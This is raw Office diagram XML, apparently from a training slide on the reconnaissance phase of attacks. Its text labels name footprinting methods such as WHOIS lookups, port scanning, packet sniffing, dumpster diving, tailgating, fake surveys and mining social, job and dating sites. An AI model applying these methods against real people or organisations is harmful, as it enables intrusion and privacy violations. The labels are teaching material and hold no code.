          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="45720" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="45720" y="124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06D22-1E26-407D-B206-9DF6B843E845}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="310074" y="324737"/>
          <a:ext cx="2364022" cy="124144"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="2364022" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="2364022" y="84600"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="84600"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="124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DE61E-B137-43C4-9AC6-B1F389F6D8C5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1840198" y="73698"/>
          <a:ext cx="1667795" cy="2510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446FB-273F-4612-B1B4-E5FD4F2E60AE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1887627" y="118755"/>
          <a:ext cx="1667795" cy="251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Reconnaissance</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1894980" y="126108"/>
        <a:ext cx="1653089" cy="236333"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AF9E4781-CB48-4A2F-BF9B-0E6D29BBE751}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6325" y="448881"/>
          <a:ext cx="607497"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E23FD-E1A8-4AF9-B34B-F40CA144A049}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="53753" y="493938"/>
          <a:ext cx="607497"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earch engine queries</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="71546" y="511731"/>
        <a:ext cx="571911" cy="621857"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9439554D-EB26-4571-84E0-75AAB095BB8C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="270" y="1230469"/>
          <a:ext cx="619607" cy="95684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A8C97-9A43-4200-87C6-2560ED75E059}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="47698" y="1275526"/>
          <a:ext cx="619607" cy="95684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ersonnel, systems, or technologies</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1050" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="65846" y="1293674"/>
        <a:ext cx="583311" cy="920545"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0226257C-9BD6-4B02-96F3-DFDF3982C092}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="708679" y="448881"/>
          <a:ext cx="741803"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DD3C4-2D65-46D6-BA7B-64F530A9E24F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="756108" y="493938"/>
          <a:ext cx="741803"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omain name searches/WHOIS lookups</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="775364" y="513194"/>
        <a:ext cx="703291" cy="618931"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AFB630DB-2579-4116-82A4-D0699D31578D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="911769" y="1230469"/>
          <a:ext cx="589919" cy="8906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53BCC-1A32-4AE9-A7EA-E0C52C802D02}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="959198" y="1275526"/>
          <a:ext cx="589919" cy="89065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Get subdomains, people’s names</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="976476" y="1292804"/>
        <a:ext cx="555363" cy="856094"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{386703CA-02B1-4845-9975-305C2F789F2D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1644529" y="448881"/>
          <a:ext cx="579781"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4A5CD-8139-4EF6-A9AD-0F1978975A6D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1691957" y="493938"/>
          <a:ext cx="579781"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ocial Engineering</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1708938" y="510919"/>
        <a:ext cx="545819" cy="623481"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{83CC19A4-4CF7-4528-A471-AA1579263EE7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1699203" y="1230469"/>
          <a:ext cx="684195" cy="97833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D0083B-4359-4415-97B7-23E903627ADF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1746631" y="1275526"/>
          <a:ext cx="684195" cy="97833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ositions, technologies, email addresses</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1050" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1766670" y="1295565"/>
        <a:ext cx="644117" cy="938260"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{96FA91CF-B4A4-45FD-839B-CB09457C644A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2432182" y="448881"/>
          <a:ext cx="603775"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264CAF-0386-4134-AFB2-8464FF9D86ED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2479610" y="493938"/>
          <a:ext cx="603775"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et </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" kern="1200" dirty="0" err="1"/>
            <a:t>Footprinting</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2497294" y="511622"/>
        <a:ext cx="568407" cy="622075"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BE6491EB-645A-474B-BDEE-5B4CD0315E7D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2461381" y="1230469"/>
          <a:ext cx="925193" cy="8924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FD50D-CA86-4FF7-AF22-D41AC5382A14}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2508810" y="1275526"/>
          <a:ext cx="925193" cy="89240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email addresses, usernames, social networks,</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2534948" y="1301664"/>
        <a:ext cx="872917" cy="840125"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{171DAE58-2C2C-4F04-AE47-1E28181FB53D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3396438" y="444937"/>
          <a:ext cx="712128"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E4A42-D81E-40EA-94F1-55A2AB8A7094}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3443867" y="489994"/>
          <a:ext cx="712128"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al </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" kern="1200" dirty="0" err="1"/>
            <a:t>Footprinting</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3463123" y="509250"/>
        <a:ext cx="673616" cy="618931"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D11AA620-CF60-45CF-A165-27C7484EE28E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3557814" y="1247331"/>
          <a:ext cx="828348" cy="8846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64E23-3BB8-4104-B7CA-AD2542641979}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3605242" y="1292388"/>
          <a:ext cx="828348" cy="88465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Ping sweeps, port scanning, reverse DNS, packet sniffing</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3629503" y="1316649"/>
        <a:ext cx="779826" cy="836129"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4B4685CB-3DBD-457A-BA96-99C6AABF3A22}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4211586" y="448881"/>
          <a:ext cx="555796"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F148B-1B8E-4B3B-B349-C4B0C3BAC9E6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4259014" y="493938"/>
          <a:ext cx="555796"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umpster Diving</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4275293" y="510217"/>
        <a:ext cx="523238" cy="624885"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{15F2F547-D928-4867-A852-BB50245E1E3B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4845143" y="448881"/>
          <a:ext cx="533882" cy="657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C7329-603F-45E9-BE14-7696963DBB79}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4892571" y="493938"/>
          <a:ext cx="533882" cy="657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Tailgating</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4908208" y="509575"/>
        <a:ext cx="502608" cy="626169"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2DC0F03A-2CB6-45D1-8CD8-F02D451AE557}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4771099" y="1230469"/>
          <a:ext cx="607655" cy="77964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A1794-C488-44A3-9C19-BC258E6D2A8B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4818528" y="1275526"/>
          <a:ext cx="607655" cy="77964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Get physical access </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" kern="1200" dirty="0"/>
            <a:t>or </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" b="1" kern="1200" dirty="0"/>
            <a:t>pictures </a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1050" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4836326" y="1293324"/>
        <a:ext cx="572059" cy="744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8DB81-A818-4AB3-A188-A224BF06F7AB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4930" y="1075329"/>
          <a:ext cx="1804485" cy="2921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rPr>
            <a:t>Human Specific -</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1200" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="13487" y="1083886"/>
        <a:ext cx="1787371" cy="275035"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B2B1B157-4476-4E81-8A83-97772E08159C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="16878380">
          <a:off x="1531016" y="875402"/>
          <a:ext cx="692582" cy="12863"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="6431"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="692582" y="64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59993" y="864519"/>
        <a:ext cx="34629" cy="34629"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A9999678-19A6-423D-AF97-25ADF4262390}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1945200" y="457397"/>
          <a:ext cx="1804485" cy="1697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ing Websites</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1950171" y="462368"/>
        <a:ext cx="1794543" cy="159788"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{00BB32A3-BB9B-47B0-BE4B-CED34698238A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="18605279">
          <a:off x="3712149" y="455172"/>
          <a:ext cx="210856" cy="12863"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="6431"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="210856"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12306" y="456332"/>
        <a:ext cx="10542" cy="10542"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B91B3487-B3E0-4721-B1DA-8AD7EA5F8E66}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3885469" y="232357"/>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err="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Linkedin</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1200" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3894173" y="241061"/>
        <a:ext cx="1787077" cy="279767"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2DBE5F84-E834-42F7-BE88-590160B5E584}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="2994721">
          <a:off x="3712149" y="616489"/>
          <a:ext cx="210856" cy="12863"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="6431"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="210856"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12306" y="617650"/>
        <a:ext cx="10542" cy="10542"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{226025E3-5D0C-4A57-9C86-C29986CB2E96}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3885469" y="554992"/>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Job Portals</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3894173" y="563696"/>
        <a:ext cx="1787077" cy="279767"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{87E06F25-E2AF-4E5C-9F89-ED95A8C19C69}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="3888949">
          <a:off x="1717761" y="1359354"/>
          <a:ext cx="319094" cy="12863"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="6431"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="319094" y="64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69330" y="1357808"/>
        <a:ext cx="15954" cy="15954"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{138E7EF0-3241-4730-9B55-885645F947BA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1945200" y="1425302"/>
          <a:ext cx="1804485" cy="1697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ocial Networking Websites</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1950171" y="1430273"/>
        <a:ext cx="1794543" cy="159788"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{17840399-DAD1-4021-8E9E-9F974822D11A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="17140362">
          <a:off x="3566257" y="1261759"/>
          <a:ext cx="502640" cy="12863"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="6431"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="502640"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05011" y="1255625"/>
        <a:ext cx="25132" cy="25132"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2F801FCC-7C71-4C15-ACC2-6A8E1C2AA04D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3885469" y="877627"/>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Twitter</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3894173" y="886331"/>
        <a:ext cx="1787077" cy="279767"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5CD97FA7-D68E-45D2-B2D1-0A5603D42445}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="18605279">
          <a:off x="3712149" y="1423076"/>
          <a:ext cx="210856" cy="12863"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="6431"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="210856"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12306" y="1424237"/>
        <a:ext cx="10542" cy="10542"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{37B08A40-F777-482E-8818-267CE40186F9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3885469" y="1200262"/>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cebook</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3894173" y="1208966"/>
        <a:ext cx="1787077" cy="279767"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E0D9EE35-73AB-474E-8A52-75BE0F7163FD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="2994721">
          <a:off x="3712149" y="1584394"/>
          <a:ext cx="210856" cy="12863"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="6431"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="210856"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12306" y="1585554"/>
        <a:ext cx="10542" cy="10542"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6DDA1F4E-7148-405A-840E-FA653BB1B391}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3885469" y="1522897"/>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Dating Websites</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3894173" y="1531601"/>
        <a:ext cx="1787077" cy="279767"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5030984E-D2B0-445B-B6B2-27A1963ACEEB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="4459638">
          <a:off x="3566257" y="1745711"/>
          <a:ext cx="502640" cy="12863"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="6431"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="502640" y="6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05011" y="1739577"/>
        <a:ext cx="25132" cy="25132"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FCEDDF1F-B42C-49B9-BFCB-E360BC2073BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3885469" y="1845531"/>
          <a:ext cx="1804485" cy="297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Matrimonial Websites</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3894173" y="1854235"/>
        <a:ext cx="1787077" cy="279767"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1A036098-2ABB-43CC-A3BF-456CC4B95450}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="4459638">
          <a:off x="1625988" y="1456949"/>
          <a:ext cx="502640" cy="12863"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="6431"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="502640" y="64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64742" y="1450814"/>
        <a:ext cx="25132" cy="25132"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C3CA0E7C-3B94-4CA7-897B-4D07D3A079CB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1945200" y="1620491"/>
          <a:ext cx="1804485" cy="1697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ke Surveys</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1950171" y="1625462"/>
        <a:ext cx="1794543" cy="159788"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4ED202E6-69B9-4037-8E2F-1474157ADDE5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="4721620">
          <a:off x="1531016" y="1554543"/>
          <a:ext cx="692582" cy="12863"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="6431"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="692582" y="64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59993" y="1543661"/>
        <a:ext cx="34629" cy="34629"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{277D72A6-90D2-4429-90E9-6953844F5326}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1945200" y="1815681"/>
          <a:ext cx="1804485" cy="1697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py Services</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1950171" y="1820652"/>
        <a:ext cx="1794543" cy="159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008A9-2152-4F43-BA5E-F6DD4196DED3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="56733" y="590541"/>
          <a:ext cx="1156531" cy="110911"/>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A4177-66DF-4F25-9439-071F7C05842A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="223642" y="1429"/>
          <a:ext cx="1554637" cy="7394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ports and network services </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="245299" y="23086"/>
        <a:ext cx="1511323" cy="696097"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{53B1D6E7-1EA9-40AA-AE6D-B6BBC8522E0F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="56733" y="1514805"/>
          <a:ext cx="1156531" cy="110911"/>
        </a:xfrm>
        <a:prstGeom prst="rect">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D8E25D-7C97-4061-8BA5-6AC64E568E6E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="223642" y="925694"/>
          <a:ext cx="1554637" cy="739411"/>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services</a:t>
